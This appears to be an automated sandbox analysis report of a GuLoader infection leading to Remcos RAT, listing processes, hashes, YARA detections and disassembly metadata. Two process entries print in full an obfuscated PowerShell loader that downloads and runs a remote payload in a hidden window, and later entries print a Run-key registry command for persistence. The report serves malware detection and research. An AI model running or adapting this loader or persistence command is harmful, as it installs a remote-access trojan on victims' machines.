                                                    General

                                                    Target ID:1
                                                    Start time:01:01:56
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:01:01:56
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1825048064.00000272A04C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:01:01:56
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:01:02:09
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"
                                                    Imagebase:0x8a0000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1977930635.00000000082A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1963840942.000000000568C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1979915186.0000000009E76000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:01:02:09
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:01:02:24
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                    Imagebase:0x490000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.3171953625.0000000008920000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.3171891296.000000000891A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4145675736.000000000891A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.3171744633.000000000894D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.4136810424.0000000004F96000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:10
                                                    Start time:01:02:31
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
                                                    Imagebase:0x240000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:01:02:31
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:01:02:31
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
                                                    Imagebase:0xf20000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Executed Functions

                                                      Function 00007FFD9B97A42A Relevance: .5, Instructions: 549COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9263b26f8a4906826ed3cc8d1be4a84e460046a8073156f2d2cd4651ced828b
                                                      • Instruction ID: 66c25946a87e996a4820a28f5ff1b7d56b9e245d2212b3cdd9ba9133fdb77a29
                                                      • Opcode Fuzzy Hash: c9263b26f8a4906826ed3cc8d1be4a84e460046a8073156f2d2cd4651ced828b
                                                      • Instruction Fuzzy Hash: C2021922A1EBCD1FE766976848A56697BE1EF56220F0901FFD09CCB1E3DE186C45C342
                                                      Function 00007FFD9B8AB0F6 Relevance: .5, Instructions: 472COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1832822227.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 326e67c5bf5922372774acf70fb2fb1c0063a625fefb447b37d5587f19e2487f
                                                      • Instruction ID: 25de7aea460495e8651d280db67c1befe9a065a0620bc43cb6fe008e4e22fe50
                                                      • Opcode Fuzzy Hash: 326e67c5bf5922372774acf70fb2fb1c0063a625fefb447b37d5587f19e2487f
                                                      • Instruction Fuzzy Hash: 45F1B930A0DA8E8FEBA8DF68C8657E937D1FF58310F04426EE84DC7695DB3499458B81
                                                      Function 00007FFD9B8ABEA2 Relevance: .5, Instructions: 458COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1832822227.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 89e7bc6c5cc8fc96c9f6cd9056a1f1e8daa68c1e70f538092cb5a07a98d69b41
                                                      • Instruction ID: e332f1e9a807f8da02caf34031389c2c6eaf1be51341110063458740d5b813cf
                                                      • Opcode Fuzzy Hash: 89e7bc6c5cc8fc96c9f6cd9056a1f1e8daa68c1e70f538092cb5a07a98d69b41
                                                      • Instruction Fuzzy Hash: 47E1C630A09A4E8FEBA8DF68C8657E97BD1FF58310F04426ED84DC7295DF7499418B81
                                                      Function 00007FFD9B977CC1 Relevance: 1.4, Instructions: 1440COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: acd14c601284ffecad4acb2e82ca8ad055c4a7d23e185e1af43367d366625b9d
                                                      • Instruction ID: f2578c1590484ed7580f40c9eae3437bc9782ec564d6bc9fabbd830d94f3dcad
                                                      • Opcode Fuzzy Hash: acd14c601284ffecad4acb2e82ca8ad055c4a7d23e185e1af43367d366625b9d
                                                      • Instruction Fuzzy Hash: 76B20531A1EA8D5FEBA5DB5888E4A647BE1FF65304F1900BDD00DCB1E3DA29AC45C741
                                                      Function 00007FFD9B9796A7 Relevance: .6, Instructions: 578COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 115c8981da1ff36e5bf6e8660a5af74e0fb3164132fb9e90bcdeb912c4c80784
                                                      • Instruction ID: d3913617b8fbda5d2bff7e101b1d54c7be287f09ef0300b3fcf3b477826ff359
                                                      • Opcode Fuzzy Hash: 115c8981da1ff36e5bf6e8660a5af74e0fb3164132fb9e90bcdeb912c4c80784
                                                      • Instruction Fuzzy Hash: 1F023A22B1EB892FEBA5DB6C48A95647BD1EF56210F1A01FEC05CCB1E3DE18AD45C341
                                                      Function 00007FFD9B97ACEF Relevance: .5, Instructions: 466COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5864a1fcd437c14100d817eeb4ede9587d4f90802e52ba2bec59a6fff00e9597
                                                      • Instruction ID: 4d75dd5ce256619f876e0dbd840e0fb506c43225cf3f11b88e43e2880a14bca9
                                                      • Opcode Fuzzy Hash: 5864a1fcd437c14100d817eeb4ede9587d4f90802e52ba2bec59a6fff00e9597
                                                      • Instruction Fuzzy Hash: 4AE14522B1EB891FE7A9DB6848A16787BE1EF56310F1901BED05DC71E3DE18AC458342
                                                      Function 00007FFD9B979F84 Relevance: .4, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b268a48314e3ad7f69592c0f96cea0f5b812c2c5b98fb33361ed13c3493b905
                                                      • Instruction ID: 3314799ee422db0daa33f979bcb9cfbef5b425d9a35b0668958598781986593f
                                                      • Opcode Fuzzy Hash: 4b268a48314e3ad7f69592c0f96cea0f5b812c2c5b98fb33361ed13c3493b905
                                                      • Instruction Fuzzy Hash: 79B14722B1EBCD1FE766977858A15B47FE1EF52210B0A01FBD099CB1E3D909AD06C352
                                                      Function 00007FFD9B97566D Relevance: .4, Instructions: 377COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
